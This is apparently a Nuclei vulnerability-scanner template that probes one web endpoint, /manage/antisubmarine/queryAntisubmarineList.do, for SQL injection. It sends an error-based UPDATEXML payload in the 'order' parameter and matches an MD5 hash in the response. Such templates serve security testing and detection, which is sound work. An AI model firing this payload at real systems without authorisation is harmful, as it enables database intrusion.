http:
    - extractors:
        - group: 0
          name: sql-injection-result
          regex:
            - ~e10adc3949ba59abbe56e057f20f883e~
          type: regex
      matchers:
        - status:
            - 200
          type: status
        - part: body
          regex:
            - ~e10adc3949ba59abbe56e057f20f883e~
          type: regex
      matchers-condition: and
      raw:
        - |
          GET /manage/antisubmarine/queryAntisubmarineList.do?recoToken=67mds2pxXQb&page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x7e,md5(123456),0x7e,(SELECT+(ELT(123=123,1)))),8357)) HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
          Accept: */*
id: sql-injection-antisubmarine
info:
    author: ProjectDiscoveryAI
    description: |
        This template checks for a potential SQL Injection vulnerability in the `/manage/antisubmarine/queryAntisubmarineList.do` endpoint by using a crafted payload to manipulate the SQL query.
    name: SQL Injection in Antisubmarine Query
    severity: high
    tags: []
